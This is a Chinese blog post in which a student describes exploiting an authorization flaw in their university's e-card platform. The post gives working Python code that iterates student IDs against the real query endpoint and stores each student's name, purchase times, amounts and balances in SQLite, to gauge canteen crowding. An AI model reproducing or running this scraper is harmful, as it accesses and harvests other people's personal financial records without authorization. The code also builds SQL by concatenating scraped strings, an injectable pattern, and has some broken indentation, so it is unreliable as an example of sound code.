这篇文章上次修改于 873 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

起因

这几天开始在学校吃饭了,然而每天中午排队的人实在太多,又不想出宿舍看下...想做个实时监控学校一卡通消费动态的东西,这样就能不出宿舍就知道现在食堂的人多不多了,(笑

0x1

正好,学校一卡通平台存在一个越权,可以拿来跑爬虫
0x1.1
可以看到,post请求主体包含了学号以及查询的日期区间。
0x1.2

0x2

OK
那就剩下写code了...
爬虫的核心部分

def craw(stuid):
    day = time.strftime("%Y-%m-%d", time.localtime())
    conn = sqlite3.connect('datas_'+day+'.db')
    sqlexec = conn.cursor()
    value = []
    url = "http://ecard.swust.edu.cn/web/admin/ecardrules;jsessionid=66C1FF6AA93810DD5DDCEB67D2B62D0?p_p_id=accounttransdtl&p_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_pos=1&p_p_col_count=5&_accounttransdtl_struts_action=%2Fext%2Faccounttransdtl_queryresult"
    payload = {"custId": "", "stuempno": stuid, "queryaccountdtl_begindate": day, "queryaccountdtl_enddate": day}
    r = requests.post(url, data=payload)
soup = bs4.BeautifulSoup(r.text, "html.parser")
    if soup.tbody:
        sqlCreatTable = "create table stu_" + str(stuid) + " (name varchar(255),time_day varchar(255),time_min varchar(255),type varchar(255),consume varchar(255),remainder varchar(255));"
        sqlexec.execute(sqlCreatTable)
        for i in soup.tbody.find_all("td"):
            value.append(i.string)
        for count in range(len(value)/8):
            sqlIncertValue = "INSERT INTO stu_" + str(stuid) + " (name,time_day,time_min,type,consume,remainder) VALUES ('" + value[3+8*count] + "', '" + value[0+8*count] + "','" + value[1+8*count] + "', '" + value[4+8*count] + "','" + value[6+8*count] + "','" + value[7+8*count] + "')"
            sqlexec.execute(sqlIncertValue)

        print "crawing:"+str(stuid)
    else:
        print str(stuid)+" is not exist."
    conn.commit()
conn.close()

数据整理的核心部分

day = time.strftime("%Y-%m-%d", time.localtime())
conn = sqlite3.connect('datas_' + day + '.db')
s = conn.cursor()
skip=5
stuid=[]
x=[]
y=[]
s.execute("select * from sqlite_master")
for i in s.fetchall():
    stuid.append(i[1])
for hour in range(24):
    for min in range(0,60,skip):
        tmp_add = 0
        if hour<10:
            s_hour="0"+str(hour)
        else:
            s_hour=str(hour)
        if min<10:
            s_min="0"+str(min)
        else:
            s_min=str(min)
        x.append(s_hour+":"+s_min)
        for stu_one in stuid:
            s.execute("select * from "+stu_one+" where time_min like '"+s_hour+"%'")
            for time_m in s.fetchall():
                if min-skip<=int(time_m[2][2:4]) and int(time_m[2][2:4])<=min:
                    tmp_add+=1
        y.append(tmp_add)

其他的多进程和绘图部分就不放了

0x3

从图里看出来,十二点整时候那5分钟会暂时有一个谷底.0.0
interesting
0x3